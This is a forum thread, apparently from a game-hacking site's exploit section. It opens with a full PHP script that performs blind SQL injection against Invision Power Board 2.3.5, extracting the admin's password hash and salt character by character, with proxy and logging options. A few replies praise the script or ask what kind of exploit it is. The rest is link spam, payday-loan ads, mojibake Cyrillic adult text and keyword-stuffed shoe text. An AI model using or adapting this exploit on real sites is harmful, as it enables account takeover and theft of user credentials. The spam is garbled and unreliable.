ipb 2.3.5

[GG2GG]

[PHP]<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//================================================== ===================
$url = 'https://localhost/ipb.2.3.5/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//================================================== ====================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff
///////////////////////////////////////////////////////////////////////
//================================================== ===================
///////////////////////////////////////////////////////////////////////
$cli = php_sapi_name() === 'cli';
//================================================== ===================
// Warning, if executed from webserver
//================================================== ===================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"https://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">https://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
@set_time_limit(0);
}
}
//================================================== ===================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");

$hash = get_hash();
$salt = get_salt();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
add_line("Salt: $salt");
add_line("------------------------------------------");

xecho("\n------------------------------------------\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");

xecho("\nQuestions and feedback - https://www.waraxe.us/ \n");
die("See ya! \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;

$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff !== 'found')
{
die('Invalid response, target URL not valid? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function test_target_id()
{
global $url, $prefix, $id;

$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
if(!test_condition($post))
{
die('Invalid response, target ID not valid? Exiting ...');
}
}
///////////////////////////////////////////////////////////////////////
function get_salt()
{
$len = 5;
$out = '';

xecho("Finding salt ...\n");

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_saltchar($i);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}

xecho("\nFinal salt: $out\n\n");

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos)
{
global $prefix, $id;

$char = '';
$min = 32;
$max = 128;
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$post = $pattern . '%253e' . $curr;

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

xecho("Current test: $curr-$max-$min\n");
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$out = '';

xecho("Finding hash ...\n");

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}

xecho("\nFinal hash: $out\n\n");

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos)
{
global $prefix, $id;

$char = '';
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";

// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$post = $pattern . '%253e' . $curr;

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

xecho("Current test: $curr-$max-$min\n");
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;

$bret = false;
$maxtry = 10;
$try = 1;

$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);

while(1)
{
$buff = trim(make_post($url, $post, '', $url));

if($buff === 'found')
{
$bret = true;
break;
}
elseif($buff === 'notfound')
{
break;
}
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');

if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);

if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;

$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
//////////////////////////////////////////////////////////////////////
?>
[/PHP]

dont know how to use it?

then dont make stupid ass comments, this isnt the tutorial section this is the exploit section.

[Delusi0nal]

Ahh yes ive seen this exploit before, works like a cham.

tell you what does suck though, cracking MD5 Hashes

[Lielestnics]

Палю тему )))
https://vk.byym****
халява века ёбанарот ))))
клик

[denniskauf]

Hi everyone

I'm new here and came to this topic on MPGH - MultiPlayer Game Hacking - Hack Hacks Downloads, Combat Arms Hacks, CrossFire Hacks, Medal of Honor Hacks, Black OPS Hacks, WarRock Hacks, Soldier Front Hacks, Sudden Attack Hacks, Operation 7 Hacks, AVA Hacks, Battlefield Hacks, Bad Company 2 from yahoo search engine.

I really think this topic on MPGH - MultiPlayer Game Hacking - Hack Hacks Downloads, Combat Arms Hacks, CrossFire Hacks, Medal of Honor Hacks, Black OPS Hacks, WarRock Hacks, Soldier Front Hacks, Sudden Attack Hacks, Operation 7 Hacks, AVA Hacks, Battlefield Hacks, Bad Company 2 is really interesting.

I'm work on personal loans related work and I have a blog which giving out info about personal loans

Now I don't have to worry about the unexpected bill getting paid. No personal questions, bad credit accepted, and the money is directly deposited into your checking account. I would suggest this service to anyone who needs quick, fast no faxing payday loans.

A payday loan (also called a paycheck advance) is a small, short-term loan that is intended to cover a borrower's expenses until his or her next payday. The loans are also sometimes referred to as cash advances, though that term can also refer to cash provided against a prearranged line of credit such as a credit card.

I really hope that everyone here don't need some unexpected cash, but if any emergency appears, do not hesitate to use these services!

big respect !

[Chairman Mao]

Thank you GG2GG for this exploit. Is this SQL, XSS or other type of exploit? And where are the credits?

As for the spammers, GTFO!

[lennocka]

Ïîñëå ÷åãî îíà ñìûêàåò íîãè íà ñïèíå ìóæà äà, òû ïîíÿëà ïðàâèëüíî îí ñîâåðøàë ïîëîâîé àêò íå äëÿ ïîëó÷åíèÿ óäîâîëüñòâèÿ, à ðàäè ðîæäåíèÿ íîâûõ ïîòîêîâ ýíåðãèè è îáíîâëåíèÿ ñèë. Ýòî äîñòóïíî ìàãè÷åñêèìè, îíè ñêîðåå ñëåäóþò èç ðåäêîé ãàðìîíè÷íîñòè åãî ñîñóùåñòâîâàíèÿ âðà÷è íàñòîÿòåëüíî ðåêîìåíäóþò ñðî÷íî âûéòè çàìóæ èëè æåíèòüñÿ, ÷òîáû ïîëó÷èòü.
ßéöà ôîòî ìèíåò

Ïîñëå ÷åãî îíà ñìûêàåò íîãè íà ñïèíå ìóæà äà, òû ïîíÿëà ïðàâèëüíî îí ñîâåðøàë ïîëîâîé àêò íå äëÿ ïîëó÷åíèÿ óäîâîëüñòâèÿ, à ðàäè ðîæäåíèÿ íîâûõ ïîòîêîâ ýíåðãèè è îáíîâëåíèÿ ñèë. Ýòî äîñòóïíî ìàãè÷åñêèìè, îíè ñêîðåå ñëåäóþò èç ðåäêîé ãàðìîíè÷íîñòè åãî ñîñóùåñòâîâàíèÿ âðà÷è íàñòîÿòåëüíî ðåêîìåíäóþò ñðî÷íî âûéòè çàìóæ èëè æåíèòüñÿ, ÷òîáû ïîëó÷èòü.
Àóäèî ïîðíî ðàññêàçû

[nakeinert]

Сдаются комнаты в Адлере.
<a href=https://namore.land****>гостевой дом мамайка сочи</a>
адлеркурорт фото
https://namore.land**** - адлер гостиница просвещения

[nakeinert]

Сдаются комнаты в Адлере.
<a href=https://namore.land****>цены мини гостиницы адлер</a>
отдых в россии сочи
https://namore.land**** - адлеркурорт фрегат

[Wiz'Khalifa.]

What's This?.

[ze.us]

Ty *

[Soigotito]

Hello Kitty Love You
8 Scissors Nut brown off the page Online Events origami painting paper mache Party planning Pattern pattern making PDF file PDF files Pencil drawing photography pillows pipe cleaners place mat polymer clay Pompoms poppy red Pouch Premium Craft Glue Prima product review Project Runway ProvoCraft purse/wallet quick tip quilting Real Red stampin pad recycling Regal Rose stampin pad repurpose rose Rose's studio scarf scissors sharpener scrapbook kits scrapbooking script texture sculpture self challenges sew-along sewing buddies shamrock green shape templates shopping Sketch club sketches skirt Smurfs snow Splatters Stamps spray mists Spring squeeze punch St Patricks day Stampin Up! Stamping stash orgainisation Steam nike free run men Punk Sweet Pea SwissGirl Designs Techniques teddy bears texture plates Tim Holtz products titanium rotary cutter to do list toilet roll craft toys Travel activities trousers Tutorial Ultra Shape Express Uncategorized up to Upelkuchen (eat me cake) upholstering versamark stamp pad video Blog Video make-n-take Vincent Van Gogh Wacom water soluble pencils Watercolour painting Web SitesWhimisical words white embossing powder wig x-stitch. November 04, 2011 Every one of the Girls Populace Cup Of 2007, 2008 Olympics Council advanced the legal right to organizer ones 2010 Cookware Gaming Titles about Indonesia, kid remains chief concerning China And Tiawan's labors to allow them to spark Trainers Specific inherent probably of the profession, in order to forecasts, because womens nike free run of 2006, the national games cumulus market is predicted develop into 80 million sets, amazingly a huge existing open area does offer noticeably turned on the national initiative Black-Jack Shoe Business Concern aims. (read more)
Author: dretrwrds dretrwrds.

They are a style of sheepskin boot having wool liner lining and a tanned outer surface which can be worn by both men and women. Uggs have been identified as a fashion trend since the early 2000s. It isfour adjustable shelves. The must-have will help you create Buy Supra TK Society Purple,Supra TK Society Purple Suede supratksocietypurple.blinkweb.com more space and allow you to gain some control over your clutter. Over 24 port Rack Strap If you waste a lot of time in the morning, in search of your ties and belts, youll love this innovative tie rack and belt.

E skill that can be learned. Hanger Accessories Organize your accessories with these beautiful plates. This nike free run men article is at eye level.

Unsupportive shoes can lead to knee and back pain. Spenco insoles also promote the overall wellness of your feet. The reinforcement of Spenco insoles may encourage you to walk properly, preventing uneven wear and extending the life of the soles. As an added bonus, you will not have to suffer through the uncomfortable 'breaking in period stiff soles can cause. Any discomfort that your shoes caused in the past will be alleviated as the Spenco insoles cradle and support your feet.

Since the Nike Dunk shoes were launched in 1998, it had become more and more popular. At first, the Nike Dunk shoes were made form the canvas, and this style supra tk society purple Nike shoe were introduced to people as a basketball shoe. Now let us share some word about the various styles and colors of the Nike Dunks. Then we have a look about the technology of the Nike Dunks.